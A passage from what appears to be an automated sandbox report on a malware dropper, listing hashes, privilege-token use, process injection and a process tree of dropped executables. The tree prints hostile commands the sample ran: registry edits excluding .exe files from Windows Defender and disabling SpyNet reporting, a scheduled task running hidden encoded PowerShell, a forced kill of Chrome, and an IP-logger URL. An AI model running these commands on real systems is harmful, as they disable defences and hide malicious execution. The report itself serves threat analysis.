745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	tnskCXTQ3t_OPZ1RlasU8Rsb.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 251 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	251	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

42c371e393e888b8ff2e0c2f24193ee9.exep8QVXQKdFAF7Z4pkLQV3LbU7.exe

pid	process
4036	42c371e393e888b8ff2e0c2f24193ee9.exe
4036	42c371e393e888b8ff2e0c2f24193ee9.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

fnw17a1dYyA_cdbCy40vgDbb.exe

pid process

4132 fnw17a1dYyA_cdbCy40vgDbb.exe

pid	process
4132	fnw17a1dYyA_cdbCy40vgDbb.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tnskCXTQ3t_OPZ1RlasU8Rsb.exetaskkill.exefind.exe

description	pid	process
Token: SeCreateTokenPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeAssignPrimaryTokenPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeLockMemoryPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeIncreaseQuotaPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeMachineAccountPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeTcbPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeSecurityPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeTakeOwnershipPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeLoadDriverPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeSystemProfilePrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeSystemtimePrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeProfSingleProcessPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeIncBasePriorityPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeCreatePagefilePrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeCreatePermanentPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeBackupPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeRestorePrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeShutdownPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeDebugPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeAuditPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeSystemEnvironmentPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeChangeNotifyPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeRemoteShutdownPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeUndockPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeSyncAgentPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeEnableDelegationPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeManageVolumePrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeImpersonatePrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeCreateGlobalPrivilege	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: 31	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: 32	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: 33	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: 34	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: 35	3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
Token: SeDebugPrivilege	4360	taskkill.exe
Token: SeCreateTokenPrivilege	5092	find.exe
Token: SeAssignPrimaryTokenPrivilege	5092	find.exe
Token: SeLockMemoryPrivilege	5092	find.exe
Token: SeIncreaseQuotaPrivilege	5092	find.exe
Token: SeMachineAccountPrivilege	5092	find.exe
Token: SeTcbPrivilege	5092	find.exe
Token: SeSecurityPrivilege	5092	find.exe
Token: SeTakeOwnershipPrivilege	5092	find.exe
Token: SeLoadDriverPrivilege	5092	find.exe
Token: SeSystemProfilePrivilege	5092	find.exe
Token: SeSystemtimePrivilege	5092	find.exe
Token: SeProfSingleProcessPrivilege	5092	find.exe
Token: SeIncBasePriorityPrivilege	5092	find.exe
Token: SeCreatePagefilePrivilege	5092	find.exe
Token: SeCreatePermanentPrivilege	5092	find.exe
Token: SeBackupPrivilege	5092	find.exe
Token: SeRestorePrivilege	5092	find.exe
Token: SeShutdownPrivilege	5092	find.exe
Token: SeDebugPrivilege	5092	find.exe
Token: SeAuditPrivilege	5092	find.exe
Token: SeSystemEnvironmentPrivilege	5092	find.exe
Token: SeChangeNotifyPrivilege	5092	find.exe
Token: SeRemoteShutdownPrivilege	5092	find.exe
Token: SeUndockPrivilege	5092	find.exe
Token: SeSyncAgentPrivilege	5092	find.exe
Token: SeEnableDelegationPrivilege	5092	find.exe
Token: SeManageVolumePrivilege	5092	find.exe
Token: SeImpersonatePrivilege	5092	find.exe
Token: SeCreateGlobalPrivilege	5092	find.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

Accostarmi.exe.pif

pid process

3164 Accostarmi.exe.pif
2456
2456
3164 Accostarmi.exe.pif
3164 Accostarmi.exe.pif
3164 Accostarmi.exe.pif
2456
2456
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Accostarmi.exe.pif

pid process

3164 Accostarmi.exe.pif
3164 Accostarmi.exe.pif
3164 Accostarmi.exe.pif
3164 Accostarmi.exe.pif
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

zhangj.exezhangj.exe

pid process

4384 zhangj.exe
4384 zhangj.exe
4796 zhangj.exe
4796 zhangj.exe

pid	process
3164	Accostarmi.exe.pif
2456
2456
3164	Accostarmi.exe.pif
3164	Accostarmi.exe.pif
3164	Accostarmi.exe.pif
2456
2456

pid	process
3164	Accostarmi.exe.pif
3164	Accostarmi.exe.pif
3164	Accostarmi.exe.pif
3164	Accostarmi.exe.pif

pid	process
4384	zhangj.exe
4384	zhangj.exe
4796	zhangj.exe
4796	zhangj.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

42c371e393e888b8ff2e0c2f24193ee9.exej983aU7mLXKldwRB_TAPSL62.exe9j_wXMaNSottrO7JtYW1aAtP.exe

description	pid	process	target process
PID 4036 wrote to memory of 2144	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
PID 4036 wrote to memory of 2144	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
PID 4036 wrote to memory of 4080	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	9j_wXMaNSottrO7JtYW1aAtP.exe
PID 4036 wrote to memory of 4080	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	9j_wXMaNSottrO7JtYW1aAtP.exe
PID 4036 wrote to memory of 4080	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	9j_wXMaNSottrO7JtYW1aAtP.exe
PID 4036 wrote to memory of 4076	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	xWLRw6KAtqAoF3uYufezyU9I.exe
PID 4036 wrote to memory of 4076	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	xWLRw6KAtqAoF3uYufezyU9I.exe
PID 4036 wrote to memory of 4076	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	xWLRw6KAtqAoF3uYufezyU9I.exe
PID 4036 wrote to memory of 1780	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	aSRMIbDkVo8osmoJWbe0dJbt.exe
PID 4036 wrote to memory of 1780	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	aSRMIbDkVo8osmoJWbe0dJbt.exe
PID 4036 wrote to memory of 1780	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	aSRMIbDkVo8osmoJWbe0dJbt.exe
PID 4036 wrote to memory of 1840	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	5KrMMzV4lYg34LPlN2TKrre2.exe
PID 4036 wrote to memory of 1840	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	5KrMMzV4lYg34LPlN2TKrre2.exe
PID 4036 wrote to memory of 1840	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	5KrMMzV4lYg34LPlN2TKrre2.exe
PID 4036 wrote to memory of 2152	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	zIjziXqTZtL6TVi_WXzxttya.exe
PID 4036 wrote to memory of 2152	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	zIjziXqTZtL6TVi_WXzxttya.exe
PID 4036 wrote to memory of 2152	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	zIjziXqTZtL6TVi_WXzxttya.exe
PID 4036 wrote to memory of 2904	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	zwCiq6ExDDwgz0LzeWEbVyZn.exe
PID 4036 wrote to memory of 2904	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	zwCiq6ExDDwgz0LzeWEbVyZn.exe
PID 4036 wrote to memory of 2904	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	zwCiq6ExDDwgz0LzeWEbVyZn.exe
PID 4036 wrote to memory of 3568	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	FSiutCi_C9g5l_U_qzWouquE.exe
PID 4036 wrote to memory of 3568	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	FSiutCi_C9g5l_U_qzWouquE.exe
PID 4036 wrote to memory of 2528	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	DDVvwjLb77LpKqM9KFJTxOqm.exe
PID 4036 wrote to memory of 2528	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	DDVvwjLb77LpKqM9KFJTxOqm.exe
PID 4036 wrote to memory of 2528	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	DDVvwjLb77LpKqM9KFJTxOqm.exe
PID 4036 wrote to memory of 2720	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	o4jcM6LrerPSL5EwekSwbTN2.exe
PID 4036 wrote to memory of 2720	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	o4jcM6LrerPSL5EwekSwbTN2.exe
PID 4036 wrote to memory of 2720	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	o4jcM6LrerPSL5EwekSwbTN2.exe
PID 4036 wrote to memory of 2948	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	nbSiITdIUKyZbJtbvZkILKqa.exe
PID 4036 wrote to memory of 2948	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	nbSiITdIUKyZbJtbvZkILKqa.exe
PID 4036 wrote to memory of 2948	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	nbSiITdIUKyZbJtbvZkILKqa.exe
PID 4036 wrote to memory of 2656	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	_Oo_LwtjZ89hfSyHPy6yIhwe.exe
PID 4036 wrote to memory of 2656	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	_Oo_LwtjZ89hfSyHPy6yIhwe.exe
PID 4036 wrote to memory of 2656	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	_Oo_LwtjZ89hfSyHPy6yIhwe.exe
PID 4036 wrote to memory of 3920	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
PID 4036 wrote to memory of 3920	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
PID 4036 wrote to memory of 3920	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
PID 4036 wrote to memory of 3392	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	FFXAiRNs4EldPaihY1sTKXkb.exe
PID 4036 wrote to memory of 3392	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	FFXAiRNs4EldPaihY1sTKXkb.exe
PID 4036 wrote to memory of 3392	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	FFXAiRNs4EldPaihY1sTKXkb.exe
PID 4036 wrote to memory of 3236	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	R9vbL0ypLAopLUN_Ov5e85_v.exe
PID 4036 wrote to memory of 3236	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	R9vbL0ypLAopLUN_Ov5e85_v.exe
PID 4036 wrote to memory of 3236	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	R9vbL0ypLAopLUN_Ov5e85_v.exe
PID 4036 wrote to memory of 2724	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	cdRFSbaD5wfOwUq5OD8Y_bgN.exe
PID 4036 wrote to memory of 2724	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	cdRFSbaD5wfOwUq5OD8Y_bgN.exe
PID 4036 wrote to memory of 2724	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	cdRFSbaD5wfOwUq5OD8Y_bgN.exe
PID 4036 wrote to memory of 756	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	aTtFt7lCS6ZI8vNMzQ_AnQdm.exe
PID 4036 wrote to memory of 756	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	aTtFt7lCS6ZI8vNMzQ_AnQdm.exe
PID 4036 wrote to memory of 756	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	aTtFt7lCS6ZI8vNMzQ_AnQdm.exe
PID 4036 wrote to memory of 2248	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	j983aU7mLXKldwRB_TAPSL62.exe
PID 4036 wrote to memory of 2248	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	j983aU7mLXKldwRB_TAPSL62.exe
PID 4036 wrote to memory of 2248	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	j983aU7mLXKldwRB_TAPSL62.exe
PID 4036 wrote to memory of 1412	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
PID 4036 wrote to memory of 1412	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
PID 4036 wrote to memory of 1412	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
PID 4036 wrote to memory of 1856	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	DILH6y1J6d67_qFohQhl5yIk.exe
PID 4036 wrote to memory of 1856	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	DILH6y1J6d67_qFohQhl5yIk.exe
PID 4036 wrote to memory of 1856	4036	42c371e393e888b8ff2e0c2f24193ee9.exe	DILH6y1J6d67_qFohQhl5yIk.exe
PID 2248 wrote to memory of 1532	2248	j983aU7mLXKldwRB_TAPSL62.exe	Install.exe
PID 2248 wrote to memory of 1532	2248	j983aU7mLXKldwRB_TAPSL62.exe	Install.exe
PID 2248 wrote to memory of 1532	2248	j983aU7mLXKldwRB_TAPSL62.exe	Install.exe
PID 4080 wrote to memory of 2632	4080	9j_wXMaNSottrO7JtYW1aAtP.exe	dMKKX4fKZX2_x4WEKOrxzGZG.exe
PID 4080 wrote to memory of 2632	4080	9j_wXMaNSottrO7JtYW1aAtP.exe	dMKKX4fKZX2_x4WEKOrxzGZG.exe
PID 4080 wrote to memory of 2632	4080	9j_wXMaNSottrO7JtYW1aAtP.exe	dMKKX4fKZX2_x4WEKOrxzGZG.exe

C:\Users\Admin\AppData\Local\Temp\42c371e393e888b8ff2e0c2f24193ee9.exe
"C:\Users\Admin\AppData\Local\Temp\42c371e393e888b8ff2e0c2f24193ee9.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4036

C:\Users\Admin\Pictures\Adobe Films\p8QVXQKdFAF7Z4pkLQV3LbU7.exe
"C:\Users\Admin\Pictures\Adobe Films\p8QVXQKdFAF7Z4pkLQV3LbU7.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2144

C:\Users\Admin\Pictures\Adobe Films\9j_wXMaNSottrO7JtYW1aAtP.exe
"C:\Users\Admin\Pictures\Adobe Films\9j_wXMaNSottrO7JtYW1aAtP.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4080

C:\Users\Admin\Documents\dMKKX4fKZX2_x4WEKOrxzGZG.exe
"C:\Users\Admin\Documents\dMKKX4fKZX2_x4WEKOrxzGZG.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:2632

C:\Users\Admin\Pictures\Adobe Films\8Dk2cGAGxzYagX5HsEr4_IL3.exe
"C:\Users\Admin\Pictures\Adobe Films\8Dk2cGAGxzYagX5HsEr4_IL3.exe"
4⤵
- Executes dropped EXE
PID:4292

C:\Users\Admin\Pictures\Adobe Films\aCtYcV4VDEOfv82XjVcqXOye.exe
"C:\Users\Admin\Pictures\Adobe Films\aCtYcV4VDEOfv82XjVcqXOye.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:4972

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
5⤵
PID:2428

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
6⤵
- Loads dropped DLL
PID:4664

C:\Users\Admin\Pictures\Adobe Films\Z0uFzmBxFOrSVAfZnDDzjB2y.exe
"C:\Users\Admin\Pictures\Adobe Films\Z0uFzmBxFOrSVAfZnDDzjB2y.exe"
4⤵
- Executes dropped EXE
PID:4984

C:\Users\Admin\Pictures\Adobe Films\ffC70C1mCgsjIf9jnUuOSgMt.exe
"C:\Users\Admin\Pictures\Adobe Films\ffC70C1mCgsjIf9jnUuOSgMt.exe"
4⤵
- Executes dropped EXE
PID:5116

C:\Users\Admin\AppData\Local\Temp\7zS6A37.tmp\Install.exe
.\Install.exe
5⤵
- Executes dropped EXE
PID:2684

C:\Users\Admin\AppData\Local\Temp\7zS81A7.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:4892

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:3624

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:3984

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:2940

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:5084

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:5096

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:5056

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:2656

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:4924

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gOlMSUUkp" /SC once /ST 00:19:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:4816

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gOlMSUUkp"
7⤵
PID:4252

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gOlMSUUkp"
7⤵
PID:4480

C:\Users\Admin\Pictures\Adobe Films\emQfv5j5sHglqR6n71_mRXaz.exe
"C:\Users\Admin\Pictures\Adobe Films\emQfv5j5sHglqR6n71_mRXaz.exe"
4⤵
PID:5092

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:836

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4592

C:\Users\Admin\Pictures\Adobe Films\fnw17a1dYyA_cdbCy40vgDbb.exe
"C:\Users\Admin\Pictures\Adobe Films\fnw17a1dYyA_cdbCy40vgDbb.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4132

C:\Users\Admin\Pictures\Adobe Films\6ZxZzhUOKPIQfGM9V9kGCUi0.exe
"C:\Users\Admin\Pictures\Adobe Films\6ZxZzhUOKPIQfGM9V9kGCUi0.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3224

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
5⤵
- Blocklisted process makes network request
PID:3208

C:\Users\Admin\Pictures\Adobe Films\IK8j4iKdiNSim32AabSudMWC.exe
"C:\Users\Admin\Pictures\Adobe Films\IK8j4iKdiNSim32AabSudMWC.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:2628

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3488

C:\Users\Admin\AppData\Local\Temp\EI85I.exe
"C:\Users\Admin\AppData\Local\Temp\EI85I.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4232

C:\Users\Admin\AppData\Local\Temp\J38I7.exe
"C:\Users\Admin\AppData\Local\Temp\J38I7.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2272

C:\Users\Admin\AppData\Local\Temp\E67I8.exe
"C:\Users\Admin\AppData\Local\Temp\E67I8.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2968

C:\Users\Admin\AppData\Local\Temp\JF713.exe
"C:\Users\Admin\AppData\Local\Temp\JF713.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4128

C:\Users\Admin\AppData\Local\Temp\J1L4D.exe
"C:\Users\Admin\AppData\Local\Temp\J1L4D.exe"
6⤵
- Executes dropped EXE
PID:3012

C:\Users\Admin\AppData\Local\Temp\J1L4D7H7BH06JG0.exe
https://iplogger.org/1OAvJ
